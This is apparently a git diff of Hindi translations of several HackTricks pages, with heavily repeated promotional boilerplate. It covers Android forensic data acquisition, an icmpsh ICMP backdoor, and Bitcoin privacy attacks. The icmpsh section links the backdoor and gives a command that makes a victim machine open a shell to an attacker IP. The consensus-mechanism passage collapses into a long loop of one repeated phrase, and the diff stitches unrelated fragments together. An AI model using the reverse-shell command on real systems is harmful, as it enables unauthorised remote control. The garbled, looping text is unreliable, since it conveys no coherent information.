||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## Locked Device
|
||||
## लॉक किया गया डिवाइस
|
||||
|
||||
एक Android डिवाइस से डेटा निकालना शुरू करने के लिए उसे अनलॉक होना चाहिए। अगर यह लॉक है तो आप:
|
||||
एक एंड्रॉइड डिवाइस से डेटा निकालने के लिए इसे अनलॉक किया जाना चाहिए। अगर यह लॉक है तो आप कर सकते हैं:
|
||||
|
||||
* जांचें कि क्या डिवाइस में USB के माध्यम से डिबगिंग सक्रिय है।
|
||||
* संभावित [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) के लिए जांचें।
|
||||
* [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें।
|
||||
* जांचें कि डिवाइस में USB के माध्यम से डीबगिंग सक्षम है।
|
||||
* [स्मज अटैक](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) के लिए जांच करें
|
||||
* [ब्रूट-फोर्स](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) के साथ प्रयास करें
|
||||
|
||||
## Data Adquisition
|
||||
## डेटा अधिग्रहण
|
||||
|
||||
[android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) बनाएं और इसे [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar`
|
||||
[adb का उपयोग करके एंड्रॉइड बैकअप बनाएं](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) और इसे [एंड्रॉइड बैकअप एक्सट्रैक्टर](https://sourceforge.net/projects/adbextractor/) का उपयोग करके निकालें: `java -jar abe.jar unpack file.backup file.tar`
|
||||
|
||||
### If root access or physical connection to JTAG interface
|
||||
### यदि रूट एक्सेस या JTAG इंटरफेस के लिए फिजिकल कनेक्शन है
|
||||
|
||||
* `cat /proc/partitions` (फ्लैश मेमोरी के पथ की खोज करें, आमतौर पर पहली प्रविष्टि _mmcblk0_ होती है और यह पूरी फ्लैश मेमोरी के लिए होती है)।
|
||||
* `df /data` (सिस्टम के ब्लॉक साइज का पता लगाएं)।
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (ब्लॉक साइज से एकत्रित जानकारी के साथ इसे निष्पादित करें)।
|
||||
* `cat /proc/partitions` (फ्लैश मेमोरी का पथ खोजें, सामान्य रूप से पहला एंट्री _mmcblk0_ होती है और पूरी फ्लैश मेमोरी के लिए होती है)।
|
||||
* `df /data` (सिस्टम का ब्लॉक साइज़ खोजें)।
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (इसे ब्लॉक साइज़ से जुटे जानकारी के साथ चलाएं)।
|
||||
|
||||
### Memory
|
||||
### मेमोरी
|
||||
|
||||
Linux Memory Extractor (LiME) का उपयोग करके RAM जानकारी निकालें। यह एक कर्नेल एक्सटेंशन है जिसे adb के माध्यम से लोड किया जाना चाहिए।
|
||||
लिनक्स मेमोरी एक्सट्रैक्टर (LiME) का उपयोग करें रैम जानकारी निकालने के लिए। यह एक कर्नेल एक्सटेंशन है जो adb के माध्यम से लोड किया जाना चाहिए।
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
|
@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
|
|||
echo Please insert the IP where you want to listen
|
||||
read IP
|
||||
```
|
||||
# **शिकारक दल**
|
||||
# **शिकारी पक्ष**
|
||||
|
||||
**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें:
|
||||
शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें:
|
||||
```bash
|
||||
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,150 +1,144 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापन दिखाए जाए** या **HackTricks को PDF में डाउनलोड** करें तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूलभूत शब्दावली
|
||||
## मूल अवधारणाएँ
|
||||
|
||||
* **स्मार्ट कॉन्ट्रैक्ट**: स्मार्ट कॉन्ट्रैक्ट्स बेसिकली **ब्लॉकचेन पर स्टोर किए गए प्रोग्राम हैं जो निश्चित स्थितियों को पूरा होने पर चलते हैं**। वे सामान्यत: **एक समझौते** के **क्रियान्वयन** को स्वचालित करने के लिए उपयोग किए जाते हैं ताकि सभी सहभागियों को परिणाम के बारे में तुरंत पता चल सके, किसी मध्यस्थ की सहायता या समय की हानि के बिना। (से [यहाँ](https://www.ibm.com/topics/smart-contracts)).
|
||||
* मूल रूप से, एक स्मार्ट कॉन्ट्रैक्ट एक **कोड का टुकड़ा** है जो लोग जब उन्हें अनुबंध तक पहुंचते हैं तो क्रियान्वित होगा। स्मार्ट कॉन्ट्रैक्ट्स **ब्लॉकचेन में चलते हैं** (इसलिए परिणाम स्थायी रूप से स्टोर होते हैं) और लोग उन्हें स्वीकार करने से पहले पढ़ सकते हैं।
|
||||
* **डीएपी**: **डेसेंट्रलाइज्ड एप्लिकेशन** स्मार्ट कॉन्ट्रैक्ट्स के ऊपर लागू होते हैं। उनके पास एक फ्रंट-एंड होता है जहां उपयोगकर्ता एप्लिकेशन के साथ बातचीत कर सकते हैं, **बैक-एंड** सार्वजनिक होता है (ताकि इसे मूल्यांकन किया जा सके) और एक **स्मार्ट कॉन्ट्रैक्ट** के रूप में लागू किया जाता है। कभी-कभी डेटाबेस का उपयोग आवश्यक होता है, एथेरियम ब्लॉकचेन हर खाते को निश्चित संग्रह आवंटित करता है।
|
||||
* **टोकन और सिक्के**: एक **सिक्का** एक क्रिप्टोकरेंसी है जो **डिजिटल** **पैसे** के रूप में काम करता है और एक **टोकन** कुछ **मूल्य** का प्रतिनिधित्व करता है लेकिन यह एक सिक्का नहीं है।
|
||||
* **यूटिलिटी टोकन्स**: ये टोकन उपयोगकर्ता को **बाद में कुछ सेवा तक पहुंचने** की अनुमति देते हैं (यह किसी विशिष्ट वातावरण में कुछ मूल्य वाली चीज है)।
|
||||
* **सुरक्षा टोकन्स**: ये **स्वामित्व** या किसी संपत्ति का प्रतिनिधित्व करते हैं।
|
||||
* **डीफाई**: **डेसेंट्रलाइज्ड फाइनेंस**।
|
||||
* **डीईएक्स: डेसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म्स**।
|
||||
* **डीएओएस**: **डेसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स**।
|
||||
- **स्मार्ट कॉन्ट्रैक्ट्स** को उन कार्यक्रमों के रूप में परिभाषित किया जाता है जो ब्लॉकचेन पर कार्रवाई करते हैं जब कुछ शर्तें पूरी होती हैं, बिचौलियों के बिना समझौते की कार्रवाई को स्वचालित करना।
|
||||
- **डीसेंट्रलाइज्ड एप्लिकेशन्स (dApps)** स्मार्ट कॉन्ट्रैक्ट्स पर आधारित होते हैं, जिनमें एक उपयोगकर्ता-मित्रपूर्ण फ्रंट-एंड और एक पारदर्शी, जांचने योग्य बैक-एंड होता है।
|
||||
- **टोकन और सिक्के** विभाजित करते हैं जहां सिक्के डिजिटल धन के रूप में काम करते हैं, जबकि टोकन विशेष संदर्भों में मूल्य या स्वामित्व को दर्शाते हैं।
|
||||
- **यूटिलिटी टोकन्स** सेवाओं तक पहुंचने की अनुमति देते हैं, और **सिक्योरिटी टोकन्स** संपत्ति के स्वामित्व को दर्शाते हैं।
|
||||
- **डीफाई** का मतलब है डीसेंट्रलाइज्ड फाइनेंस, जो केंद्रीय प्राधिकरणों के बिना वित्तीय सेवाएं प्रदान करता है।
|
||||
- **डीएक्स** और **डीएओएस** डीसेंट्रलाइज्ड एक्सचेंज प्लेटफॉर्म और डीसेंट्रलाइज्ड ऑटोनोमस ऑर्गनाइजेशन्स को संदर्भित करते हैं।
|
||||
|
||||
# सहमति तंत्र
|
||||
## सहमति तंत्र
|
||||
|
||||
एक ब्लॉकचेन लेनदारी को मान्य करने के लिए, इसे **ब्लॉकचेन** में **जोड़ना** होगा। मान्यकर्ता (खान संचालक) इस जोड़ने का कार्य करते हैं; अधिकांश प्रोटोकॉल में, वे इसे करने के लिए **पुरस्कार प्राप्त** करते हैं। ब्लॉकचेन को सुरक्षित रखने के लिए, इसे **एक दुर्भाग्यपूर्ण उपयोगकर्ता या समूह से बड़ी संख्या में मान्यता प्राप्त करने से रोकने का एक तंत्र होना चाहिए**।
|
||||
सहमति तंत्र सुनिश्चित करते हैं और ब्लॉकचेन पर सुरक्षित और स्वीकृत लेन-देन की पुष्टि करते हैं:
|
||||
- **प्रूफ ऑफ वर्क (PoW)** लेन-देन सत्यापन के लिए कंप्यूटेशनल पावर पर निर्भर होता है।
|
||||
- **प्रूफ ऑफ स्टेक (PoS)** वैधकों से निश्चित मात्रा में टोकन रखने की मांग करता है, जो PoW की तुलना में ऊर्जा खपत को कम करता है।
|
||||
|
||||
प्रूफ ऑफ वर्क, एक और सामान्यत: उपयोग किया जाने वाला सहमति तंत्र, सौजन्य की मान्यता की जांच के लिए गणना क्षमता की मान्यता का उपयोग करता है, जिसमें एक संभावित हमलावर को वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वैधानिक वैधता के लिए वै
|
||||
```
|
||||
## बिटकॉइन महत्वपूर्ण अंश
|
||||
|
||||
### लेन-देन
|
||||
|
||||
बिटकॉइन लेन-देन में फंड ट्रांसफर शामिल होते हैं। लेन-देन डिजिटल हस्ताक्षरों के माध्यम से सत्यापित होते हैं, सुनिश्चित करते हैं कि केवल निजी कुंजी के मालिक ही स्थानांतरण प्रारंभ कर सकता है।
|
||||
|
||||
#### मुख्य घटक:
|
||||
|
||||
- **मल्टीसाइनेचर लेन-देन** को एक लेन-देन को अधिक संकेतों की आवश्यकता होती है अनुमति देने के लिए।
|
||||
- लेन-देन में **इनपुट्स** (फंड का स्रोत), **आउटपुट्स** (गंतव्य), **शुल्क** (खनिजों को दिया जाता है), और **स्क्रिप्ट्स** (लेन-देन नियम) शामिल होते हैं।
|
||||
|
||||
### लाइटनिंग नेटवर्क
|
||||
|
||||
बिटकॉइन की स्कैलेबिलिटी को बढ़ाने का उद्देश्य एक चैनल के भीतर कई लेन-देनों की अनुमति देना है, केवल अंतिम स्थिति को ब्लॉकचेन पर प्रसारित करना।
|
||||
|
||||
## बिटकॉइन गोपनीयता चिंताएँ
|
||||
|
||||
गोपनीयता हमले, जैसे कि **सामान्य इनपुट स्वामित्व** और **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**, लेन-देन पैटर्न का शोषण करते हैं। **मिक्सर्स** और **कॉइनजॉइन** जैसी रणनीतियाँ उपयोगकर्ताओं के बीच लेन-देन लिंक को अस्पष्ट करके गोपनीयता को बेहतर बनाती हैं।
|
||||
|
||||
## बिटकॉइन गोपनीयता हमले
|
||||
|
||||
# बिटकॉइन गोपनीयता हमलों का सारांश
|
||||
|
||||
बिटकॉइन के विश्व में, लेन-देनों की गोपनीयता और उपयोगकर्ताओं की गुमनामी अक्सर चिंता के विषय होते हैं। यहाँ कुछ सामान्य विधियाँ हैं जिनके माध्यम से हमलावर बिटकॉइन गोपनीयता को कमजोर कर सकते हैं।
|
||||
|
||||
## **सामान्य इनपुट स्वामित्व मान्यता**
|
||||
|
||||
सामान्य रूप से विभिन्न उपयोगकर्ताओं से आयात एक ही लेन-देन में मिलाया जाना अत्यधिक असाधारण होता है क्योंकि इसमें जटिलता शामिल होती है। इसलिए, **एक ही लेन-देन में दो इनपुट पते अक्सर एक ही मालिक के होने का अनुमान किया जाता है**।
|
||||
|
||||
## **यूटीएक्सओ चेंज एड्रेस डिटेक्शन**
|
||||
|
||||
एक यूटीएक्सओ, या **अनखर्चित लेन-देन आउटपुट**, को एक लेन-देन में पूरी तरह से खर्च किया जाना चाहिए। अगर इसमें से केवल एक हिस्सा किसी अन्य पते पर भेजा जाता है, तो शेष नये चेंज एड्रेस पर जाता है। दर्शक इस नए पते को भेजने वाले का मानते हैं, जिससे गोपनीयता को खतरे में डाला जा सकता है।
|
||||
|
||||
### उदाहरण
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
मानते हैं कि उत्पादों में से एक चेंज है और दूसरा उत्पाद भुगतान है। दो व्याख्यान हैं: भुगतान उत्पाद या 4 BTC उत्पाद है या 1 BTC उत्पाद है। लेकिन अगर 1 BTC उत्पाद भुगतान राशि है तो 3 BTC इनपुट अनावश्यक है, क्योंकि वॉलेट केवल 2 BTC इनपुट खर्च कर सकती थी और इसे करने के लिए कम माइनर शुल्क भुगत सकती थी। यह एक संकेत है कि वास्तविक भुगतान उत्पाद 4 BTC है और 1 BTC चेंज उत्पाद है।
|
||||
## **बाध्य पता पुनः उपयोग**
|
||||
|
||||
यह वह समस्या है जिसके लिए लेनदार अधिक से अधिक इनपुट होते हैं। इस लीक को ठीक करने का एक तरीका यह है कि चेंज उत्पाद किसी भी इनपुट से अधिक होने तक अधिक इनपुट जोड़ें, उदाहरण के लिए:
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 6 btc
|
||||
5 btc
|
||||
```
|
||||
## मजबूर पता पुनरउपयोग
|
||||
हमलावार छोटी मात्रा में पहले से उपयोग किए गए पतों पर धन भेज सकते हैं, आशा है कि प्राप्तकर्ता भविष्य की लेन-देन में इन्हें अन्य इनपुट के साथ मिला दें, जिससे पते को एक साथ जोड़ा जा सके।
|
||||
|
||||
**मजबूर पता पुनरउपयोग** या **प्रोत्साहित पता पुनरउपयोग** एक प्रकार की है जब एक प्रतिकूल व्यक्ति ब्लॉक श्रृंखला पर पहले से ही उपयोग किए गए पतों को बिटकॉइन की एक (अक्सर छोटी) राशि देता है। दुश्मन उम्मीद करता है कि उपयोगकर्ता या उनका वॉलेट सॉफ्टवेयर **भुगतान को एक बड़े लेन-देन के लिए इनपुट के रूप में उपयोग करेगा जिससे सामान्य-इनपुट-स्वामित्व** नियमानुसार अन्य पतों को प्रकट करेगा। ये भुगतान अप्रत्याशित पता पुनरउपयोग में पता मालिक को मनोबलित पता पुनरउपयोग के रूप में समझा जा सकता है।
|
||||
### सही वॉलेट व्यवहार
|
||||
इस गोपनीयता लीक को रोकने के लिए वॉलेट को खाली पतों पर प्राप्त किए गए सिक्कों का उपयोग न करना चाहिए।
|
||||
|
||||
यह हमला कभी-कभी गलती से **धूल अटैक** कहलाता है।
|
||||
## **अन्य ब्लॉकचेन विश्लेषण तकनीकें**
|
||||
|
||||
वॉलेट्स द्वारा सही व्यवहार यह है कि खाली पतों पर जमी मुद्रा को खर्च न करें।
|
||||
- **सटीक भुगतान राशियाँ:** बिना परिवर्तन के लेन-देन एक उपयोगकर्ता द्वारा स्वामित्व में होने की संभावना है।
|
||||
- **गोल नंबर:** एक लेन-देन में गोल नंबर एक भुगतान का सुझाव देता है, जिसमें गोल आउटपुट संभावित रूप से परिवर्तन होता है।
|
||||
- **वॉलेट फिंगरप्रिंटिंग:** विभिन्न वॉलेट्स के अद्वितीय लेन-देन निर्माण पैटर्न होते हैं, जिससे विश्लेषक सॉफ़्टवेयर का पता लगा सकते हैं और संभावित रूप से परिवर्तन पता लगा सकते हैं।
|
||||
- **राशि और समय संबंध:** लेन-देन के समय या राशि का खुलासा करना लेन-देन को ट्रेसेबल बना सकता है।
|
||||
|
||||
## अन्य ब्लॉकचेन विश्लेषण
|
||||
## **ट्रैफिक विश्लेषण**
|
||||
|
||||
